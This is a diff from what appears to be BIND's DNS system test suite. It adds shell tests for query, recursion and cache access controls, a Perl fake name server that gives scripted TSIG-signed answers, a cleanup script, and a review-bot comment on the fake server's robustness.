'^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 33 - views over options, views allow, query allowed +n=`expr $n + 1` +copy_setports ns2/named33.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views over options, views allow - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 34 - views over options, views disallow, query refused +n=`expr $n + 1` +copy_setports ns2/named34.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views over options, views disallow - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Tests for allow-query in the zone statements + +n=40 + +# Test 41 - zone default, query allowed +n=`expr $n + 1` +copy_setports ns2/named40.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: zone default - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 42 - zone explicit any, query allowed +n=`expr $n + 1` +echo_i "test $n: zone explicit any - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.any.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.any.example' dig.out.ns2.$n > 
/dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 43 - zone none, query refused +n=`expr $n + 1` +echo_i "test $n: zone none - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.none.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.none.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 44 - zone address allowed, query allowed +n=`expr $n + 1` +echo_i "test $n: zone address allowed - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.addrallow.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.addrallow.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 45 - zone address not allowed, query refused +n=`expr $n + 1` +echo_i "test $n: zone address not allowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.addrnotallow.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.addrnotallow.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 46 - zone address disallowed, query refused +n=`expr $n + 1` +echo_i "test $n: zone address disallowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.addrdisallow.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.addrdisallow.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 47 - zone acl allowed, query allowed +n=`expr $n + 1` +echo_i "test $n: zone acl allowed - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.aclallow.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' 
dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.aclallow.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 48 - zone acl not allowed, query refused +n=`expr $n + 1` +echo_i "test $n: zone acl not allowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.aclnotallow.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.aclnotallow.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 49 - zone acl disallowed, query refused +n=`expr $n + 1` +echo_i "test $n: zone acl disallowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.acldisallow.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.acldisallow.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 50 - zone key allowed, query allowed +n=`expr $n + 1` +echo_i "test $n: zone key allowed - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 -y one:1234abcd8765 a.keyallow.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.keyallow.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 51 - zone key not allowed, query refused +n=`expr $n + 1` +echo_i "test $n: zone key not allowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 -y two:1234efgh8765 a.keyallow.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.keyallow.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 52 - zone key disallowed, query refused +n=`expr $n + 1` +echo_i "test $n: zone key disallowed - query refused" 
+ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 -y one:1234abcd8765 a.keydisallow.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.keydisallow.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 53 - zones over options, zones allow, query allowed +n=`expr $n + 1` +copy_setports ns2/named53.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views over options, views allow - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 54 - zones over options, zones disallow, query refused +n=`expr $n + 1` +copy_setports ns2/named54.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views over options, views disallow - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 55 - zones over views, zones allow, query allowed +n=`expr $n + 1` +copy_setports ns2/named55.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: zones over views, views allow - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 56 - zones over views, zones disallow, query refused +n=`expr $n + 1` +copy_setports ns2/named56.conf.in ns2/named.conf +rndc_reload 
ns2 10.53.0.2 + +echo_i "test $n: zones over views, views disallow - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 57 - zones over views, zones disallow, query refused (allow-query-on) +n=`expr $n + 1` +copy_setports ns2/named57.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: zones over views, allow-query-on" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.1.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.1.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.1.$n > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.aclnotallow.example a > dig.out.ns2.2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.2.$n > /dev/null || ret=1 +grep '^a.aclnotallow.example' dig.out.ns2.2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 58 - allow-recursion default +n=`expr $n + 1` +echo_i "test $n: default allow-recursion configuration" +ret=0 +$DIG -p ${PORT} @10.53.0.3 -b 127.0.0.1 a.normal.example a > dig.out.ns3.1.$n +grep 'status: NOERROR' dig.out.ns3.1.$n > /dev/null || ret=1 +$DIG -p ${PORT} @10.53.0.3 -b 10.53.0.1 a.normal.example a > dig.out.ns3.2.$n +grep 'status: REFUSED' dig.out.ns3.2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 59 - allow-query-cache default +n=`expr $n + 1` +echo_i "test $n: default allow-query-cache configuration" +ret=0 +$DIG -p ${PORT} @10.53.0.3 -b 127.0.0.1 ns . > dig.out.ns3.1.$n +grep 'status: NOERROR' dig.out.ns3.1.$n > /dev/null || ret=1 +$DIG -p ${PORT} @10.53.0.3 -b 10.53.0.1 ns . 
> dig.out.ns3.2.$n +grep 'status: REFUSED' dig.out.ns3.2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 60 - block recursion-on, allow query-cache-on +n=`expr $n + 1` +copy_setports ns3/named2.conf.in ns3/named.conf +rndc_reload ns3 10.53.0.3 + +echo_i "test $n: block recursion-on, allow query-cache-on" +ret=0 +# this should query the cache, and an answer should already be there +$DIG -p ${PORT} @10.53.0.3 a.normal.example a > dig.out.ns3.1.$n +grep 'recursion requested but not available' dig.out.ns3.1.$n > /dev/null || ret=1 +grep 'ANSWER: 1' dig.out.ns3.1.$n > /dev/null || ret=1 +# this should require recursion and therefore can't get an answer +$DIG -p ${PORT} @10.53.0.3 b.normal.example a > dig.out.ns3.2.$n +grep 'recursion requested but not available' dig.out.ns3.2.$n > /dev/null || ret=1 +grep 'ANSWER: 0' dig.out.ns3.2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 61 - inheritance of allow-query-cache-on from allow-recursion-on +n=`expr $n + 1` +copy_setports ns3/named3.conf.in ns3/named.conf +rndc_reload ns3 10.53.0.3 + +echo_i "test $n: inheritance of allow-query-cache-on" +ret=0 +# this should query the cache, an answer should already be there +$DIG -p ${PORT} @10.53.0.3 a.normal.example a > dig.out.ns3.1.$n +grep 'ANSWER: 1' dig.out.ns3.1.$n > /dev/null || ret=1 +# this should be refused due to allow-recursion-on/allow-query-cache-on +$DIG -p ${PORT} @10.53.1.2 a.normal.example a > dig.out.ns3.2.$n +grep 'recursion requested but not available' dig.out.ns3.2.$n > /dev/null || ret=1 +grep 'status: REFUSED' dig.out.ns3.2.$n > /dev/null || ret=1 +# this should require recursion and should be allowed +$DIG -p ${PORT} @10.53.0.3 c.normal.example a > dig.out.ns3.3.$n +grep 'ANSWER: 1' dig.out.ns3.3.$n > /dev/null || ret=1 +# this should require recursion and be refused +$DIG -p ${PORT} @10.53.1.2 d.normal.example a > dig.out.ns3.4.$n +grep 
'recursion requested but not available' dig.out.ns3.4.$n > /dev/null || ret=1 +grep 'status: REFUSED' dig.out.ns3.4.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 62 - inheritance of allow-recursion-on from allow-query-cache-on +n=`expr $n + 1` +copy_setports ns3/named4.conf.in ns3/named.conf +rndc_reload ns3 10.53.0.3 + +echo_i "test $n: inheritance of allow-recursion-on" +ret=0 +# this should query the cache, an answer should already be there +$DIG -p ${PORT} @10.53.0.3 a.normal.example a > dig.out.ns3.1.$n +grep 'ANSWER: 1' dig.out.ns3.1.$n > /dev/null || ret=1 +# this should be refused due to allow-recursion-on/allow-query-cache-on +$DIG -p ${PORT} @10.53.1.2 a.normal.example a > dig.out.ns3.2.$n +grep 'recursion requested but not available' dig.out.ns3.2.$n > /dev/null || ret=1 +grep 'status: REFUSED' dig.out.ns3.2.$n > /dev/null || ret=1 +# this should require recursion and should be allowed +$DIG -p ${PORT} @10.53.0.3 e.normal.example a > dig.out.ns3.3.$n +grep 'ANSWER: 1' dig.out.ns3.3.$n > /dev/null || ret=1 +# this should require recursion and be refused +$DIG -p ${PORT} @10.53.1.2 f.normal.example a > dig.out.ns3.4.$n +grep 'recursion requested but not available' dig.out.ns3.4.$n > /dev/null || ret=1 +grep 'status: REFUSED' dig.out.ns3.4.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/ans.pl b/bin/tests/system/ans.pl new file mode 100644 index 0000000..446316f --- /dev/null +++ b/bin/tests/system/ans.pl 
@@ -0,0 +1,531 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# This is the name server from hell. It provides canned +# responses based on pattern matching the queries, and +# can be reprogrammed on-the-fly over a TCP connection. +# +# The server listens for queries on port 5300 (or PORT). +# +# The server listens for control connections on port 5301 (or EXTRAPORT1). +# +# A control connection is a TCP stream of lines like +# +# /pattern/ +# name ttl type rdata +# name ttl type rdata +# ... +# /pattern/ +# name ttl type rdata +# name ttl type rdata +# ... +# +# There can be any number of patterns, each associated +# with any number of response RRs. Each pattern is a +# Perl regular expression. If an empty pattern ("//") is +# received, the server will ignore all incoming queries (TCP +# connections will still be accepted, but both UDP queries +# and TCP queries will not be responded to). If a non-empty +# pattern is then received over the same control connection, +# default behavior is restored. +# +# Each incoming query is converted into a string of the form +# "qname qtype" (the printable query domain name, space, +# printable query type) and matched against each pattern. +# +# The first pattern matching the query is selected, and +# the RR following the pattern line are sent in the +# answer section of the response. +# +# Each new control connection causes the current set of +# patterns and responses to be cleared before adding new +# ones. +# +# The server handles UDP and TCP queries. Zone transfer +# responses work, but must fit in a single 64 k message. 
+# +# Now you can add TSIG, just specify key/key data with: +# +# /pattern <key> <key_data>/ +# name ttl type rdata +# name ttl type rdata +# +# Note that this data will still be sent with any request for +# pattern, only this data will be signed. Currently, this is only +# done for TCP. +# +# /pattern bad-id <key> <key_data>/ +# /pattern bad-id/ +# +# will add 50 to the message id of the response. + + +use IO::File; +use IO::Socket; +use Data::Dumper; +use Net::DNS; +use Net::DNS::Packet; +use strict; + +# Ignore SIGPIPE so we won't fail if peer closes a TCP socket early +local $SIG{PIPE} = 'IGNORE'; + +# Flush logged output after every line +local $| = 1; + +# We default to listening on 10.53.0.2 for historical reasons +# XXX: we should also be able to specify IPv6 +my $server_addr = "10.53.0.2"; +if (@ARGV > 0) { + $server_addr = @ARGV[0]; +} + +my $mainport = int($ENV{'PORT'}); +if (!$mainport) { $mainport = 5300; } +my $ctrlport = int($ENV{'EXTRAPORT1'}); +if (!$ctrlport) { $ctrlport = 5301; } + +# XXX: we should also be able to set the port numbers to listen on. 
+my $ctlsock = IO::Socket::INET->new(LocalAddr => "$server_addr", + LocalPort => $ctrlport, Proto => "tcp", Listen => 5, Reuse => 1) or die "$!"; + +my $udpsock = IO::Socket::INET->new(LocalAddr => "$server_addr", + LocalPort => $mainport, Proto => "udp", Reuse => 1) or die "$!"; + +my $tcpsock = IO::Socket::INET->new(LocalAddr => "$server_addr", + LocalPort => $mainport, Proto => "tcp", Listen => 5, Reuse => 1) or die "$!"; + +print "listening on $server_addr:$mainport,$ctrlport.\n"; +print "Using Net::DNS $Net::DNS::VERSION\n"; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!";; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +#my @answers = (); +my @rules; +my $udphandler; +my $tcphandler; + +sub handleUDP { + my ($buf) = @_; + my $request; + + if ($Net::DNS::VERSION > 0.68) { + $request = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($request, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + my @questions = $request->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + my $qclass = $questions[0]->qclass; + my $id = $request->header->id; + + my $packet = new Net::DNS::Packet($qname, $qtype, $qclass); + $packet->header->qr(1); + $packet->header->aa(1); + $packet->header->id($id); + + # get the existing signature if any, and clear the additional section + my $prev_tsig; + while (my $rr = $request->pop("additional")) { + $prev_tsig = $rr if ($rr->type eq "TSIG"); + } + + my $r; + foreach $r (@rules) { + my $pattern = $r->{pattern}; + my($dbtype, $key_name, $key_data) = split(/ /,$pattern); + print "[handleUDP] $dbtype, $key_name, $key_data \n"; + if ("$qname $qtype" =~ /$dbtype/) { + my $a; + foreach $a (@{$r->{answer}}) { + $packet->push("answer", $a); + } + if(defined($key_name) && defined($key_data)) { + my 
$tsig; + # Sign the packet + print " Signing the response with " . + "$key_name/$key_data\n"; + + if ($Net::DNS::VERSION < 0.69) { + $tsig = Net::DNS::RR->new( + "$key_name TSIG $key_data"); + } else { + $tsig = Net::DNS::RR->new( + name => $key_name, + type => 'TSIG', + key => $key_data); + } + + # These kluges are necessary because Net::DNS + # doesn't know how to sign responses. We + # clear compnames so that the TSIG key and + # algorithm name won't be compressed, and + # add one to arcount because the signing + # function will attempt to decrement it, + # which is incorrect in a response. Finally + # we set request_mac to the previous digest. + $packet->{"compnames"} = {} + if ($Net::DNS::VERSION < 0.70); + $packet->{"header"}{"arcount"} += 1 + if ($Net::DNS::VERSION < 0.70); + if (defined($prev_tsig)) { + if ($Net::DNS::VERSION < 0.73) { + my $rmac = pack('n H*', + length($prev_tsig->mac)/2, + $prev_tsig->mac); + $tsig->{"request_mac"} = + unpack("H*", $rmac); + } else { + $tsig->request_mac( + $prev_tsig->mac); + } + } + + $packet->sign_tsig($tsig); + } + last; + } + } + #$packet->print; + + return $packet->data; +} + +# namelen: +# given a stream of data, reads a DNS-formatted name and returns its +# total length, thus making it possible to skip past it. +sub namelen { + my ($data) = @_; + my $len = 0; + my $label_len = 0; + do { + $label_len = unpack("c", $data); + $data = substr($data, $label_len + 1); + $len += $label_len + 1; + } while ($label_len != 0); + return ($len); +} + +# packetlen: +# given a stream of data, reads a DNS wire-format packet and returns +# its total length, making it possible to skip past it. +sub packetlen { + my ($data) = @_; + my $q; + my $rr; + my $header; + my $offset; + + # + # decode/encode were introduced in Net::DNS 0.68 + # parse is no longer a method and calling it here makes perl croak. 
+ # + my $decode = 0; + $decode = 1 if ($Net::DNS::VERSION >= 0.68); + + if ($decode) { + ($header, $offset) = Net::DNS::Header->decode(\$data); + } else { + ($header, $offset) = Net::DNS::Header->parse(\$data); + } + + for (1 .. $header->qdcount) { + if ($decode) { + ($q, $offset) = + Net::DNS::Question->decode(\$data, $offset); + } else { + ($q, $offset) = + Net::DNS::Question->parse(\$data, $offset); + } + } + for (1 .. $header->ancount) { + if ($decode) { + ($q, $offset) = Net::DNS::RR->decode(\$data, $offset); + } else { + ($q, $offset) = Net::DNS::RR->parse(\$data, $offset); + } + } + for (1 .. $header->nscount) { + if ($decode) { + ($q, $offset) = Net::DNS::RR->decode(\$data, $offset); + } else { + ($q, $offset) = Net::DNS::RR->parse(\$data, $offset); + } + } + for (1 .. $header->arcount) { + if ($decode) { + ($q, $offset) = Net::DNS::RR->decode(\$data, $offset); + } else { + ($q, $offset) = Net::DNS::RR->parse(\$data, $offset); + } + } + return $offset; +} + +# sign_tcp_continuation: +# This is a hack to correct the problem that Net::DNS has no idea how +# to sign multiple-message TCP responses. Several data that are included +# in the digest when signing a query or the first message of a response are +# omitted when signing subsequent messages in a TCP stream. +# +# Net::DNS::Packet->sign_tsig() has the ability to use a custom signing +# function (specified by calling Packet->sign_func()). We use this +# function as the signing function for TCP continuations, and it removes +# the unwanted data from the digest before calling the default sign_hmac +# function. 
+sub sign_tcp_continuation { + my ($key, $data) = @_; + + # copy out first two bytes: size of the previous MAC + my $rmacsize = unpack("n", $data); + $data = substr($data, 2); + + # copy out previous MAC + my $rmac = substr($data, 0, $rmacsize); + $data = substr($data, $rmacsize); + + # try parsing out the packet information + my $plen = packetlen($data); + my $pdata = substr($data, 0, $plen); + $data = substr($data, $plen); + + # remove the keyname, ttl, class, and algorithm name + $data = substr($data, namelen($data)); + $data = substr($data, 6); + $data = substr($data, namelen($data)); + + # preserve the TSIG data + my $tdata = substr($data, 0, 8); + + # prepare a new digest and sign with it + $data = pack("n", $rmacsize) . $rmac . $pdata . $tdata; + return Net::DNS::RR::TSIG::sign_hmac($key, $data); +} + +sub handleTCP { + my ($buf) = @_; + my $request; + + if ($Net::DNS::VERSION > 0.68) { + $request = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($request, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + my @questions = $request->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + my $qclass = $questions[0]->qclass; + my $id = $request->header->id; + + my $opaque; + + my $packet = new Net::DNS::Packet($qname, $qtype, $qclass); + $packet->header->qr(1); + $packet->header->aa(1); + $packet->header->id($id); + + # get the existing signature if any, and clear the additional section + my $prev_tsig; + my $signer; + my $continuation = 0; + if ($Net::DNS::VERSION < 0.81) { + while (my $rr = $request->pop("additional")) { + if ($rr->type eq "TSIG") { + $prev_tsig = $rr; + } + } + } + + my @results = (); + my $count_these = 0; + + my $r; + foreach $r (@rules) { + my $pattern = $r->{pattern}; + my($dbtype, $key_name, $key_data, $extra) = split(/ /,$pattern); + print "[handleTCP] $dbtype, $key_name, $key_data \n"; + if ("$qname $qtype" =~ /$dbtype/) { + $count_these++; + my $a; + foreach $a 
(@{$r->{answer}}) { + $packet->push("answer", $a); + } + if(defined($key_name) && $key_name eq "bad-id") { + $packet->header->id(($id+50)%0xffff); + $key_name = $key_data; + $key_data = $extra; + } + if (defined($key_name) && defined($key_data)) { + my $tsig; + # sign the packet + print " Signing the data with " . + "$key_name/$key_data\n"; + + if ($Net::DNS::VERSION < 0.69) { + $tsig = Net::DNS::RR->new( + "$key_name TSIG $key_data"); + } elsif ($Net::DNS::VERSION >= 0.81 && + $continuation) { + } elsif ($Net::DNS::VERSION >= 0.75 && + $continuation) { + $tsig = $prev_tsig; + } else { + $tsig = Net::DNS::RR->new( + name => $key_name, + type => 'TSIG', + key => $key_data); + } + + # These kluges are necessary because Net::DNS + # doesn't know how to sign responses. We + # clear compnames so that the TSIG key and + # algorithm name won't be compressed, and + # add one to arcount because the signing + # function will attempt to decrement it, + # which is incorrect in a response. Finally + # we set request_mac to the previous digest. 
+ $packet->{"compnames"} = {} + if ($Net::DNS::VERSION < 0.70); + $packet->{"header"}{"arcount"} += 1 + if ($Net::DNS::VERSION < 0.70); + if (defined($prev_tsig)) { + if ($Net::DNS::VERSION < 0.73) { + my $rmac = pack('n H*', + length($prev_tsig->mac)/2, + $prev_tsig->mac); + $tsig->{"request_mac"} = + unpack("H*", $rmac); + } elsif ($Net::DNS::VERSION < 0.81) { + $tsig->request_mac( + $prev_tsig->mac); + } + } + + $tsig->sign_func($signer) if defined($signer); + $tsig->continuation($continuation) if + ($Net::DNS::VERSION >= 0.71 && + $Net::DNS::VERSION <= 0.74 ); + if ($Net::DNS::VERSION < 0.81) { + $packet->sign_tsig($tsig); + } elsif ($continuation) { + $opaque = $packet->sign_tsig($opaque); + } else { + $opaque = $packet->sign_tsig($request); + } + $signer = \&sign_tcp_continuation + if ($Net::DNS::VERSION < 0.70); + $continuation = 1; + + my $copy = + Net::DNS::Packet->new(\($packet->data)); + $prev_tsig = $copy->pop("additional"); + } + #$packet->print; + push(@results,$packet->data); + $packet = new Net::DNS::Packet($qname, $qtype, $qclass); + $packet->header->qr(1); + $packet->header->aa(1); + $packet->header->id($id); + } + } + print " A total of $count_these patterns matched\n"; + return \@results; +} + +# Main +my $rin; +my $rout; +for (;;) { + $rin = ''; + vec($rin, fileno($ctlsock), 1) = 1; + vec($rin, fileno($tcpsock), 1) = 1; + vec($rin, fileno($udpsock), 1) = 1; + + select($rout = $rin, undef, undef, undef); + + if (vec($rout, fileno($ctlsock), 1)) { + warn "ctl conn"; + my $conn = $ctlsock->accept; + my $rule = (); + @rules = (); + while (my $line = $conn->getline) { + chomp $line; + if ($line =~ m!^/(.*)/$!) 
{ + if (length($1) == 0) { + $udphandler = sub { return; }; + $tcphandler = sub { return; }; + } else { + $udphandler = \&handleUDP; + $tcphandler = \&handleTCP; + $rule = { pattern => $1, answer => [] }; + push(@rules, $rule); + } + } else { + push(@{$rule->{answer}}, + new Net::DNS::RR($line)); + } + } + $conn->close; + #print Dumper(@rules); + #print "+=+=+ $rules[0]->{'pattern'}\n"; + #print "+=+=+ $rules[0]->{'answer'}->[0]->{'rname'}\n"; + #print "+=+=+ $rules[0]->{'answer'}->[0]\n"; + } elsif (vec($rout, fileno($udpsock), 1)) { + printf "UDP request\n"; + my $buf; + $udpsock->recv($buf, 512); + my $result = &$udphandler($buf); + if (defined($result)) { + my $num_chars = $udpsock->send($result); + print " Sent $num_chars bytes via UDP\n"; + } + } elsif (vec($rout, fileno($tcpsock), 1)) { + my $conn = $tcpsock->accept; + my $buf; + for (;;) { + my $lenbuf; + my $n = $conn->sysread($lenbuf, 2); + last unless $n == 2; + my $len = unpack("n", $lenbuf); + $n = $conn->sysread($buf, $len); + last unless $n == $len; + print "TCP request\n"; + my $result = &$tcphandler($buf); + if (defined($result)) { + foreach my $response (@$result) { + $len = length($response); + $n = $conn->syswrite(pack("n", $len), 2); + $n = $conn->syswrite($response, $len); + print " Sent: $n chars via TCP\n"; + } + } + } + $conn->close; + } +} diff --git a/bin/tests/system/auth/clean.sh b/bin/tests/system/auth/clean.sh new file mode 100644 index 0000000..5fb37ac --- /dev/null +++ b/bin/tests/system/auth/clean.sh 
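Review bot: In the main loop, `my $result = &$udphandler($buf);` and the matching `&$tcphandler($buf)` call use variables that are declared as bare `my $udphandler; my $tcphandler;` and only assigned when a control connection delivers a `/pattern/` line, so a query that arrives before the first control connection makes the script die on an undefined code reference. handleUDP and handleTCP are just as fragile on input: both `die` when Net::DNS cannot parse the buffer, and both call `$questions[0]->qname` without checking that the request carried a question, so a single malformed packet ends the server and the test that depends on it fails for an unrelated reason. I would guard the dispatch with `my $result = defined($udphandler) ? &$udphandler($buf) : undef;` (same for `$tcphandler`) and add `return unless @questions;` right after the question list is read in each handler. A comment above the control-socket setup would also help, stating that the control port is unauthenticated and that received patterns are compiled as Perl regexes (`=~ /$dbtype/`), so the listener is meant to stay on the test-only address.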
@@ -0,0 +1,20 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f */named.memstats
+rm -f */named.run
+rm -f */named.conf
+rm -f dig.out.test*
+rm -f ns2/example.com.bk
+rm -f ns2/example.net.bk
+rm -f ns*/managed-keys.bind* ns*/*mkeys*
diff --git a/bin/tests/system/auth/ns1/chaos.db b/bin/tests/system/auth/ns1/chaos.db
new file mode 100644
index 0000000..bbd489a
--- /dev/null
+++ b/bin/tests/system/auth/ns1/chaos.db
@@ -0,0 +1,23 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
